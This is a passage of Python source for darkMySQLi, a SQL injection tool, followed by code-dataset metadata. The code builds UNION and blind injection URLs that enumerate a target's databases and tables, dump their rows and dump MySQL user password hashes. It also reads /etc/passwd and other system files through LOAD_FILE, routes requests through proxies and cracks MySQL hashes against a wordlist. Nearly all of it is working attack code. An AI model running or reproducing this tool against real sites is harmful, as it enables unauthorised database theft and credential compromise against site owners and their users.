must be a problem.." print "Check to make sure your using the my script right!" print "READ xprog's blind sql tutorial!\n" sys.exit(1) return value ## Functions for MySQL5 hash cracking --- THANKS d3hydr8 def c1(word): s = hashlib.sha1() s.update(word[:-1]) s2 = hashlib.sha1() s2.update(s.digest()) return s2.hexdigest() def c2(word): s = sha.new() s.update(word[:-1]) s2 = sha.new() s2.update(s.digest()) return s2.hexdigest() ## Funtion for MySQL323 hash cracking def mysql323(clear): # Taken almost verbatim from mysql's source nr = 1345345333 add = 7 nr2 = 0x12345671 retval = "" for c in clear: if c == ' ' or c == '\t': continue tmp = ord(c) nr ^= (((nr & 63) + add) * tmp) + (nr << 8) nr2 += (nr2 << 8) ^ nr add += tmp res1 = nr & ((1 << 31) - 1) res2 = nr2 & ((1 << 31) - 1) return "%08lx%08lx" % (res1, res2) #say hello if len(sys.argv) <= 1: print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h" or arg == "--help": print "\n darkMySQLi v1.6 rsauron@gmail.com" print " forum.darkc0de.com" print "Usage: ./darkMySQLi.py [options]" print "Options:" print " -h, --help shows this help message and exits" print " -d, --debug display URL debug information\n" print " Target:" print " -u URL, --url=URL Target url\n" print " Methodology:" print " -b, --blind Use blind methodology (req: --string)" print " -s, --string String to match in page when the query is valid" print " Method:" print " --method=PUT Select to use PUT method ** NOT WORKING" print " Modes:" print " --dbs Enumerate databases MySQL v5+" print " --schema Enumerate Information_schema (req: -D," print " opt: -T) MySQL v5+" print " --full Enumerate all we can MySQL v5+" print " --info MySQL Server configuration MySQL v4+" print " --fuzz Fuzz Tables & Columns Names MySQL v4+" print " --findcol Find Column length MySQL v4+" print " --dump Dump database table entries (req: -T," print " opt: -D, -C, --start) MySQL v4+" print " --crack=HASH Crack MySQL Hashs (req: --wordlist)" print " --wordlist=LIS.TXT Wordlist to be used for cracking" print " Define:" print " -D DB database to enumerate" print " -T TBL database table to enumerate" print " -C COL database table column to enumerate" print " Optional:" print " --ssl To use SSL" print " --end To use + and -- for the URLS --end \"--\" (Default)" print " To use /**/ and /* for the URLS --end \"/*\"" print " --rowdisp Do not display row # when dumping" print " --start=ROW Row number to begin dumping at" print " --where=COL,VALUE Use a where clause in your dump" print " --orderby=COL Use a orderby clause in your dump" print " --cookie=FILE.TXT Use a Mozilla cookie file" print " --proxy=PROXY Use a HTTP proxy to connect to the target url" print " --output=FILE.TXT Output results of tool to this file\n" sys.exit(1) #define variables site = "" proxy = "None" arg_string = "" arg_blind = "--union" arg_table = "None" arg_database = "None" arg_columns = "None" arg_row = "Rows" arg_cookie = "None" arg_insert = "None" arg_where = "" arg_orderby = "" arg_debug = "off" arg_rowdisp = 1 arg_adminusers = 10 arg_wordlist = "" arg_ssl = "off" arg_proxy_auth = "" darkc0de = "concat(0x1e,0x1e," mode = "None" lower_bound = 0 upper_bound = 16069 line_URL = "" count_URL = "" cur_db = "" cur_table = "" terminal = "" count = 0 gets = 0 table_num = 0 num = 0 ser_ver = 3 version =[] let_pos = 1 lim_num = 0 agent = "" #Check args for arg in sys.argv: if arg == "-u" or arg == "--url": site = sys.argv[count+1] elif arg == "--output": logfile = sys.argv[count+1] elif arg == "--proxy": proxy = sys.argv[count+1] elif arg == "--proxyauth": arg_proxy_auth = sys.argv[count+1] elif arg == "--dump": mode = arg;arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg;arg_schema = sys.argv[count] elif arg == "--dbs": mode = arg;arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg;arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg;arg_info = sys.argv[count] elif arg == "--crack": mode = arg;arg_hash = sys.argv[count+1] elif arg == "--wordlist": arg_wordlist = sys.argv[count+1] elif arg == "--findcol": mode = arg;arg_findcol = sys.argv[count] elif arg == "--cookie": arg_cookie = sys.argv[count+1] elif arg == "--ssl": arg_ssl = "on" elif arg == "-b" or arg == "--blind": arg_blind = arg;arg_blind = sys.argv[count] elif arg == "-s" or arg == "--string": arg_string = sys.argv[count+1] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "--start": num = int(sys.argv[count+1]) - 1 table_num = num elif arg == "-d" or arg == "--debug": arg_debug = "on" elif arg == "--where": arg_where = sys.argv[count+1] elif arg == "--orderby": arg_orderby = sys.argv[count+1] elif arg == "--rowdisp": arg_rowdisp = sys.argv[count] arg_rowdisp = 0 elif arg == "--end": arg_end = sys.argv[count+1] if arg_end == "--": arg_eva = "+" else: arg_eva = "/**/" count+=1 #Title write file = open(logfile, "a") print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" #Arg Error Checking if mode != "--crack" and site == "": print "[-] URL is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "None": print "[-] Mode is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_ssl == "off": if site[:4] != "http": site = "http://"+site else: if site[:5] != "https": site = "https://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') if arg_cookie != "None": try: cj = cookielib.MozillaCookieJar() cj.load(arg_cookie) cookie_handler = urllib2.HTTPCookieProcessor(cj) except: print "[!] There was a problem loading your cookie file!" print "[!] Make sure the cookie file is in Mozilla Cookie File Format!" print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n" sys.exit(1) else: cookie_handler = urllib2.HTTPCookieProcessor() if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1: print "[-] Site must contain \'darkc0de\'\n" sys.exit(1) if arg_blind == "--blind" and arg_string == "": print "[-] You must specify a --string when using blind methodology.\n" sys.exit(1) if arg_columns != "None": arg_columns = arg_columns.split(",") if arg_insert != "None": arg_insert = arg_insert.split(",") if mode == "--crack" and arg_wordlist == "": print "[-] You must specify a --wordlist to crack with.\n" sys.exit(1) agent = random.choice(agents) file.write("\n|--------------------------------------------------|") file.write("\n| rsauron@gmail.com v1.6 |") file.write("\n| 1/2009 darkMySQLi.py |") file.write("\n| -- Multi Purpose MySQL Injection Tool -- |") file.write("\n| Usage: darkMySQLi.py [options] |") file.write("\n| -h help darkc0de.com |") file.write("\n|--------------------------------------------------|") ## MySQL Hash cracking if mode == "--crack": try: arg_wordlist = open(arg_wordlist, "r") except(IOError): print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1) if len(arg_hash) != 40 and len(arg_hash) != 16: print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n") sys.exit(1) arg_wordlist = arg_wordlist.readlines() print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist))) if len(arg_hash) == 40: print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash) try: import hashlib for word in arg_wordlist: if arg_hash == c1(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break except(ImportError): import sha for word in arg_wordlist: if arg_hash == c2(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break else: print "[+] Detected MySQL v4 Hash:",arg_hash print "[+] Try darkc0de hash database @ " for word in arg_wordlist: word = word.rstrip("\n") if arg_hash == mysql323(word): print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n") break print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n") sys.exit(1) #General Info print "[+] URL:",site;file.write("\n\n[+] URL: "+site) print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X")) print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end) print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie) if site[:5] == "https": print "[+] SSL: Yes";file.write("\n[+] SSL: Yes") else: print "[+] SSL: No";file.write("\n[+] SSL: No") print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent) #Build proxy list proxy_list = [];proxy_list_count = [] if proxy != "None": print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...") for p in proxy: try: match = re.findall(":",p) if len(match) == 3: arg_proxy_auth = [] prox = p.split(":") arg_proxy_auth += prox if arg_proxy_auth != "": proxy_auth_handler = urllib2.HTTPBasicAuthHandler() proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3]) opener = urllib2.build_opener(proxy_auth_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler)) proxy_list_count.append(p);arg_proxy_auth = "" else: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler)) proxy_list_count.append(p) if len(match) == 3 or len(match) == 1: print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success") else: print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success") except: print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0])) pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete") else: print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given") proxy_list.append(urllib2.build_opener(cookie_handler)) proxy_list_count.append("None") proxy_num = 0 proxy_len = len(proxy_list) ## Blind String checking! if arg_blind == "--blind": print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!") head_URL = site+"+AND+1=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 2: print "\n[-] The String you used has been found on the target page in-use more than 2 times" print "[-] This might lead to false positives with the blind methodology" print "[-] Might not mean anything.. I am just trying to help out.." print "[-] If you have problems you might know why.. ;-)\n" if len(match) == 0: print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n" sys.exit(1) if len(match) == 1: print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)") #Column Finder c0de if mode == "--findcol": print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...") print "[+] Testing: ", file.write("\n[+] Testing: ",) checkfor=[];nullFound=[];nullnum=[];makepretty = "" sitenew = site+"+AND+1=2+UNION+SELECT+" for x in xrange(1,colMax): try: sys.stdout.write("%s," % (x)) file.write(str(x)+",") sys.stdout.flush() darkc0de = "dark"+str(x)+"code" checkfor.append(darkc0de) if x > 1: sitenew += "," sitenew += "0x"+darkc0de.encode("hex") finalurl = sitenew+arg_end source = GetThatShit(finalurl) for y in checkfor: colFound = re.findall(y,source) if len(colFound) != 0: nullFound.append(colFound[0]) if len(nullFound) >= 1: print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor))) print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",) for z in nullFound: nullcol = re.findall(("\d+"),z) nullnum.append(nullcol[0]) sys.stdout.write("%s," % (nullcol[0])) file.write(str(nullcol[0])+",") sys.stdout.flush() for z in xrange(0,len(checkfor)): z+=1 if z > 1: makepretty += "," makepretty += str(z) site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site) for z in nullnum: site = site.replace("+"+z+",","+darkc0de,") site = site.replace(","+z+",",",darkc0de,") site = site.replace(","+z+arg_end,",darkc0de"+arg_end) print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site) print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close();sys.exit(1) except (KeyboardInterrupt, SystemExit): raise except: pass print "\n[!] Sorry Column Length could not be found." file.write("\n[!] Sorry Column Length could not be found.") print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!" print "[-] Done\n" sys.exit(1) #Retrieve version:user:database if arg_blind != "--blind": head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n") source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: match = match[0][0:].split("\x1e") version = match[2] user = match[3] database = match[4] print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n") print "\tUser:", user;file.write("\tUser: "+user+"\n") print "\tVersion:", version;file.write("\tVersion: "+version) else: print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n" sys.exit(1) else: print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...") while 1: config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver) source = GetThatShit(config_URL) match = re.findall(arg_string,source) if len(match) >= 1: print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!") version += str(ser_ver) break if ser_ver == 6: print "[-] Was unable to determine MySQL version.\n[-] Done" sys.exit(1) ser_ver+=1 #lets check what we can do based on version if mode == "--schema" or mode == "--dbs" or mode == "--full": if version[0] == str(4): print "\n[-] Mode Selected is incompatible with MySQL v4 Servers" print "[-] -h for help" sys.exit(1) # Mode --info if mode == "--info" and arg_blind != "--blind": head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) if yesno == "YES <-- w00t w00t": print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password") head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0] print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend)) head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)") head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end for x in range(0,int(userend)): try: source = GetThatShit(head_URL.replace("NUM",str(x))) match = re.findall("\x1e\x1e\S+",source) match = match[0].strip("\x1e").split("\x1e") if len(match) != 3: nullvar = "NULL" match += nullvar print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2])) except (KeyboardInterrupt, SystemExit): raise except: pass else: print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!" file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!") head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno)) if yesno == "YES <-- w00t w00t": fuzz_load = open(loadfilefuzz, "r").readlines() head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 1: onoff = "OFF <-- w00t w00t" else: onoff = "ON" print "\n[+] Magic quotes are:",onoff yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): ")) if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes": print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...") print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n") for sysfile in fuzz_load: sysfile = sysfile.rstrip("\n") if proxy != "None": sysfile = sysfile.replace("/","%2F") sysfile = sysfile.replace(".","%2E") if onoff == "OFF <-- w00t w00t": head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end else: head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile) head_URL = head_URL.replace("concat(","") head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","") print "[!]",head_URL;file.write("\n[!] "+head_URL) else: print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!" file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!") #Fuzz table/columns if mode == "--fuzz": fuzz_tables = open(tablefuzz, "r").readlines() fuzz_columns = open(columnfuzz, "r").readlines() print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...") print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables))) print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns))) print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...") if arg_blind == "--blind": fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1" else: fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end for table in fuzz_tables: table = table.rstrip("\n") table_URL = fuzz_URL.replace("TABLE",table) source = GetThatShit(table_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de", source); if len(match) > 0: print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table)) print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"") if arg_blind == "--blind": table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1" for column in fuzz_columns: column = column.rstrip("\n") if arg_blind == "--blind": column_URL = table_URL.replace("COLUMN",column) else: column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")") source = GetThatShit(column_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column) print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!") #Build URLS for each different mode if mode == "--schema": if arg_database != "None" and arg_table == "None": if arg_blind == "--blind": print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"") count_URL = site+"+and+((SELECT+COUNT(table_name)" count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+table_name" line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex") else: print "[+] Showing Tables & Columns from database \""+arg_database+"\"" file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)") count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex") arg_row = "Tables" if arg_database != "None" and arg_table != "None": if arg_blind == "--blind": print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") count_URL = site+"+and+((SELECT+COUNT(column_name)" count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+column_name" line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") else: print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") arg_row = "Columns" elif mode == "--dump": print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"" file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"") print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns)) if arg_blind == "--blind": darkc0de = "" for column in arg_columns: darkc0de += column+",0x3a," darkc0de = darkc0de.rstrip("0x3a,") count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table else: for column in arg_columns: darkc0de += column+",0x1e," count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table if arg_where != "" or arg_orderby != "": if arg_where != "": arg_where = arg_where.split(",") print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\"" arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex") if arg_orderby != "": arg_orderby = "ORDER+BY+'"+arg_orderby+"'" print "[+] ORDERBY clause:",arg_orderby count_URL += "+"+arg_where line_URL += "+"+arg_where+"+"+arg_orderby if version[0] == 4: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table elif mode == "--full": print "[+] Starting full SQLi information_schema enumeration..." line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") elif mode == "--dbs": print "[+] Showing all databases current user has access too!" file.write("\n[+] Showing all databases current user has access too!") if arg_blind == "--blind": count_URL = site+"+and+((SELECT+COUNT(schema_name)" count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+schema_name" line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex") else: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)") line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") arg_row = "Databases" if arg_blind == "--blind": count_URL+="))" line_URL+="+LIMIT+" else: count_URL += arg_end line_URL += "+LIMIT+NUM,1"+arg_end ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it... if mode == "--info" and arg_blind == "--blind": head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) print "\n[+] Showing database version, username@location, and database name!" file.write("\n\n[+] Showing database version, username@location, and database name!") line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database()))," row_value = 1 #Lets Count how many rows or columns if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": if arg_blind == "--blind": row_value = GuessValue(count_URL) else: source = GetThatShit(count_URL) match = re.findall("\x1e\x1e\S+",source) match = match[0][2:].split("\x1e") row_value = match[0] print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n") ## UNION Schema Enumeration and DataExt loop if arg_blind == "--union": if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": while int(table_num) != int(row_value): try: source = GetThatShit(line_URL.replace("NUM",str(num))) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: if mode == "--schema" or mode == "--full": match = match[0][2:].split("\x1e") if cur_db != match[0]: cur_db = match[0] if table_num == 0: print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n") else: print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n") print "[Table: Columns]";file.write("[Table: Columns]\n") if cur_table != match[1]: print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2], file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2]) cur_table = match[1] #table_num+=1 table_num = int(table_num) + 1 else: sys.stdout.write(",%s" % (match[2])) file.write(","+match[2]) sys.stdout.flush() #Gathering Databases only elif mode == "--dbs": match = match[0] if table_num == 0: print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) else: print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) table_num+=1 #Collect data from tables & columns elif mode == "--dump": match = re.findall("\x1e\x1e+.+\x1e\x1e",source) if match == []: match = [''] else: match = match[0].strip("\x1e").split("\x1e") if arg_rowdisp == 1: print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",) else: print;file.write("\n") for ddata in match: if ddata == "": ddata = "NoDataInColumn" sys.stdout.write("%s:" % (ddata)) file.write("%s:" % ddata) sys.stdout.flush() table_num+=1 else: if mode == "--dump": table_num+=1 sys.stdout.write("\n[%s] No data" % (num)) file.write("\n[%s] No data" % (num)) break num+=1 except (KeyboardInterrupt, SystemExit): raise except: pass ## Blind Schema Enumeration and DataExt loop if arg_blind == "--blind": if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info": lower_bound = 0 upper_bound = 127 print for data_row in range(int(num), row_value): sys.stdout.write("[%s]: " % (lim_num)) file.write("\n[%s]: " % (lim_num)) sys.stdout.flush() value = chr(upper_bound) while value != chr(0): if mode == "--info": Guess_URL = line_URL + str(let_pos)+",1))" else: Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))" value = chr(GuessValue(Guess_URL)) sys.stdout.write("%s" % (value)) file.write(value) sys.stdout.flush() let_pos+=1 print lim_num = int(lim_num) + 1 let_pos = 1 data_row+=1 #Lets wrap it up! if mode == "--schema" or mode == "--full" or mode == "--dump": print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) else: print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close()
51,001
Python
.py
902
40.178492
175
0.469678
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,913
BeautifulSoup.py
